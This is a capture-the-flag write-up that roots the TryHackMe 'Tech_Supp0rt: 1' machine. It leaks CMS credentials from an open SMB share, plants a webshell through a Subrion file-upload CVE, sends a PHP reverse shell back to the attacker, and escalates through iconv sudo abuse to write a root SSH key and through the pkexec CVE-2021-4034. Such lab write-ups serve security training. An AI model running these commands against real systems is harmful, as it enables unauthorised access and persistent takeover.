THM: Tech_Supp0rt: 1 is a linux boot to root challenge where we’ll pwn a fake tech support scam company. We’ll start by leaking credentials for a web CMS through an open SMB share. The CMS turns out to be vulnerable to authenticated arbitrary file uploads, and since we have creds we can exploit this to get a shell. Once on the box, there are 2 paths we can take to getting a root shell. One involves pivoting to another user on the system and exploiting their sudo privileges, and another involves exploiting CVE-2021-4043.


└─$ sudo rustscan -a -- -sV -oA nmap1    

22/tcp  open  ssh         syn-ack ttl 61 OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http        syn-ack ttl 61 Apache httpd 2.4.18 ((Ubuntu))
139/tcp open  netbios-ssn syn-ack ttl 61 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn syn-ack ttl 61 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: Host: TECHSUPPORT; OS: Linux; CPE: cpe:/o:linux:linux_kernel

On port 80 all we see is the default Apache page, so let’s scan for some content.

└─$ ffuf -t 100 -u -w /usr/share/wordlists/dirb/big.txt -c                         1 ⨯

.htpasswd               [Status: 403, Size: 276, Words: 20, Lines: 10]
.htaccess               [Status: 403, Size: 276, Words: 20, Lines: 10]
server-status           [Status: 403, Size: 276, Words: 20, Lines: 10]
test                    [Status: 301, Size: 309, Words: 20, Lines: 10]
wordpress               [Status: 301, Size: 314, Words: 20, Lines: 10]

In the /wordpress directory we have what looks like a broken/unfinished website for a tech support company.

Tech Support Homepage

Let’s run wpscan to take a closer look.

└─$ wpscan --url                                                              4 ⨯
Interesting Finding(s):                                                                                                                                           

[+] WordPress version 5.7.2 identified (Insecure, released on 2021-05-12).
 | Found By: Emoji Settings (Passive Detection)
 |  -, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.7.2'
 | Confirmed By: Meta Generator (Passive Detection)
 |  -, Match: 'WordPress 5.7.2'

(Scan results are truncated for brevity.)

WPscan identified the version of WordPress as 5.7.2 and notes that it may be insecure.

A quick search on exploit-db doesn’t turn up anything, so let’s switch gears and look at SMB.

└─$ enum4linux -a                                                                                  
Starting enum4linux v0.8.9 ( ) on Sat Aug 20 09:02:58 2022
|    Share Enumeration on    |                                                                     
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./ line 640.       
        Sharename       Type      Comment                                                                      
        ---------       ----      -------                                                                      
        print$          Disk      Printer Drivers                                                              
        websvr          Disk                                                                                   
        IPC$            IPC       IPC Service (TechSupport server (Samba, Ubuntu))                             
SMB1 disabled -- no workgroup available                                                                        
[+] Attempting to map shares on                                                                    
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./ line 654.       
//$    Mapping: DENIED, Listing: N/A                                                          
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./ line 654.       
//    Mapping: OK, Listing: OK                                                               
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./ line 654.       
//$      [E] Can't understand response:                                                         
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*                                                                     

enum4linux found a websvr share that we can access without authenticating, so let’s download a copy of whatever is on this share.

└─$ smbclient --user='' -N //
Try "help" to get a list of possible commands.
smb: \> mask ""
smb: \> recurse
smb: \> prompt
smb: \> mget *
getting file \enter.txt of size 273 as enter.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: \>

All we have is a text file, but it has some interesting information:

└─$ cat enter.txt     
1)Make fake popup and host it online on Digital Ocean server
2)Fix subrion site, /subrion doesn't work, edit from panel
3)Edit wordpress website

Subrion creds
|->admin:7sKvn...REDACTED...KWCk [cooked with magical formula]
Wordpress creds

We found some credentials for Subrion which is another open source CMS.

The note we found hints that there is also a /subrion directory, so let’s fuzz that.

└─$ ffuf -t 100 -u -w /usr/share/wordlists/dirb/big.txt -c -ac

favicon.ico             [Status: 200, Size: 1150, Words: 10, Lines: 4]
robots.txt              [Status: 200, Size: 142, Words: 9, Lines: 8]
sitemap.xml             [Status: 200, Size: 628, Words: 6, Lines: 4]

Great, the robots.txt is a good find. Now we know where the admin panel is.

└─$ curl                                            
User-agent: *
Disallow: /backup/
Disallow: /cron/?
Disallow: /front/
Disallow: /install/
Disallow: /panel/
Disallow: /tmp/
Disallow: /updates/

Subrion CMS login form

We already know admin is a username, we just need to crack the password. The note we found hinted the password is “cooked with a magical formula”. 🤔

CyberChef has a really neat “magic” operation where it will attempt to deobfuscate input by automatically determining the encoding scheme that was used to generate the obfuscated string.

Using this feature we will be able to get the plaintext version of the password and then log in to the Subrion Admin Panel.

Getting a Shell

Let’s search for exploits for this version 4.2.1 of Subrion.

There is an authenticated arbitrary file upload exploit that looks very interesting. It uploads a web shell and provides a CLI interface. We can use this to send ourselves a reverse shell.

We can searchsploit -m 49876 to pull a copy of the exploit.

└─$ python3 -u -l admin -p Scam2021
[+] SubrionCMS 4.2.1 - File Upload Bypass to RCE - CVE-2018-19422 

[+] Trying to connect to:
[+] Success!
[+] Got CSRF token: YcotFAkgY8Oj7eL54nQhWa9s2VEwdNtpAOppL848
[+] Trying to log in...
[+] Login Successful!

[+] Generating random name for Webshell...
[+] Generated webshell name: aysmrezeebarxrx

[+] Trying to Upload Webshell..
[+] Upload Success... Webshell path: 

$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Now with this PHP payload we can send a shell:

php -r '$sock=fsockopen("",9001);$proc=proc_open("/bin/bash", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'

└─$ nc -nlvp 9001
listening on [any] 9001 ...
connect to [] from (UNKNOWN) [] 39798
uid=33(www-data) gid=33(www-data) groups=33(www-data)
which python
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@TechSupport:/var/www/html/subrion/uploads$ ^Z
zsh: suspended  nc -nlvp 9001
└─$ stty raw -echo; fg                                                                               148 ⨯ 1 ⚙
[1]  + continued  nc -nlvp 9001

<ww/html/subrion/uploads$ export TERM=xterm-256color                         
www-data@TechSupport:/var/www/html/subrion/uploads$ export SHELL=bash
www-data@TechSupport:/var/www/html/subrion/uploads$ stty rows 70 columns 111

Privilege Escalation

There are (at least) 2 privilege escalation paths we can take to getting a root shell on this box.

Intended Path

First let’s check for other users with shell access on the box.

www-data@TechSupport:/var/www/html/wordpress$ cat /etc/passwd | grep sh$

Both Subrion and Wordpress will have database credentials stored in config files, so let’s see if we can find the password for the scamsite user.

www-data@TechSupport:/var/www/html/wordpress$ cat wp-config.php | grep DB
define( 'DB_NAME', 'wpdb' );
define( 'DB_USER', 'support' );
define( 'DB_PASSWORD', '...REDACTED...' );
define( 'DB_HOST', 'localhost' );
define( 'DB_CHARSET', 'utf8' );
define( 'DB_COLLATE', '' );
www-data@TechSupport:/var/www/html/wordpress$ su scamsite

scamsite@TechSupport:/var/www/html/wordpress$ id
uid=1000(scamsite) gid=1000(scamsite) groups=1000(scamsite),113(sambashare)

Awesome, now we have a shell as scamsite. Let’s check for sudo privileges next.

scamsite@TechSupport:/var/www/html/wordpress$ sudo -l
Matching Defaults entries for scamsite on TechSupport:
    env_reset, mail_badpass,

User scamsite may run the following commands on TechSupport:
    (ALL) NOPASSWD: /usr/bin/iconv

We can run iconv as root, and according to GTFObins, this can be used to read and write files as root.

This means we could go ahead and read /root/root.txt, but what we really want is a root shell.

To achieve this we can generate a keypair on our machine and exploit our ability to run iconv as root to add our public key to root’s authorized keys file. This will allow us to SSH to the box as root.

└─$ ssh-keygen           
Generating public/private rsa key pair.
Enter file in which to save the key (/home/brian/.ssh/id_rsa): ./id_rsa
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in ./id_rsa
Your public key has been saved in ./
The key fingerprint is:
SHA256:sp4+MQqh+KSNDbEcT3sSB42yKlOCB/FqOW+OiDX0IF8 brian@kali
The key's randomart image is:
+---[RSA 3072]----+
|..  o            |
|.o o .           |
|..+ .            |
|++=o .           |
|*@*.E . S        |
|X==B .oo         |
|.X+++..o         |
|=.B.....         |
|o. . .+.         |

Now on the target we need to write our public key.

scamsite@TechSupport:/dev/shm$ echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDHw4FPwRC+q1Gql/DyV6HmqyPKYgbgOEp7dAIcp+mJGBdTx+1zBCKnQxvm3bsbLfK9vTiHG+wdHNFVGrsoMNpF3/ul4I1TIpFYL39vgqadbjJ2EPFmhJ3sbvB+5qM3UaG0qGTgKp9lSij5bVWVfNES2/4mihPaSNtnOBhUBFEpdY+z+3af/8rZ0nVu3uOMhng5BtUJda9zzHcTtSt2pKQw7hMMiegamoJECrLo2nW62yMrOhuNdmvJvpN1guNDFuU3bWEe1REvOZbclCT0FzdO56aGZGwpzVMTZfOlOAGtC089+kpzXmhurPawVVYvbl+zdcSNXS10GJuZzOBYWgWFFHMxcZrvgQ98Rlp3avlv8+2ylzlwj2uiR2RPLPOq7zf+z5kAxjCocw4AoqafM4DOOWExyg+a6WzFNR8GPX3GD095Q5ORgRuOt0JCHZhGI50sJYOAlbxBTVaYnoCSd/zrlbrDJ2dsf+7Pq+6ZpNlvrLzVtknVmxHHHWGUZFwiJgs= brian@kali" | sudo iconv -f 8859_1 -t 8859_1 -o "/root/.ssh/authorized_keys"

And with that, we can now SSH our way in with our key and grab the flag.

└─$ ssh -i id_rsa root@
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.4.0-186-generic x86_64)

 * Documentation:
 * Management:
 * Support:

120 packages can be updated.
88 updates are security updates.

Last login: Sun Nov 21 11:17:57 2021

root@TechSupport:~# id
uid=0(root) gid=0(root) groups=0(root)

root@TechSupport:~# wc -c /root/root.txt
44 /root/root.txt

Unintended Path

We can transfer and run LinPEAS on the target to assist with finding a privilege escalation vector.

LinPEAS identifies that the pkexec utility is vulnerable to CVE-2021-4034.

A local privilege escalation vulnerability was found on polkit’s pkexec utility. The pkexec application is a setuid tool designed to allow unprivileged users to run commands as privileged users according predefined policies. The current version of pkexec doesn’t handle the calling parameters count correctly and ends trying to execute environment variables as commands. An attacker can leverage this by crafting environment variables in such a way it’ll induce pkexec to execute arbitrary code. When successfully executed the attack can cause a local privilege escalation given unprivileged users administrative rights on the target machine.

Many of the public exploits for this vulnerability are written in C and must be compiled on the target to work, and unfortunately our target does not have one installed.

However we can use this python exploit to get a root shell. The code is short enough that we can simply copy and paste it into a file via vim or nano on the target. Then all we have to do is make it executable and run it.

www-data@TechSupport:/tmp$ chmod +x 
www-data@TechSupport:/tmp$ ./ 

[+] Creating shared library for exploit code.
[+] Calling execve()

# id
uid=0(root) gid=33(www-data) groups=33(www-data)

# cd /root && ls -la
total 48
drwx------  5 root root 4096 May 29  2021 .
drwxr-xr-x 23 root root 4096 May 28  2021 ..
-rw-------  1 root root 3588 Nov 21  2021 .bash_history
-rw-r--r--  1 root root 3106 Oct 22  2015 .bashrc
drwx------  2 root root 4096 May 28  2021 .cache
-rw-------  1 root root  382 May 29  2021 .mysql_history
drwxr-xr-x  2 root root 4096 May 28  2021 .nano
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
drwx------  2 root root 4096 May 29  2021 .ssh
-rw-------  1 root root 4332 May 29  2021 .viminfo
-rw-r--r--  1 root root   44 May 28  2021 root.txt

# wc -c root.txt
44 root.txt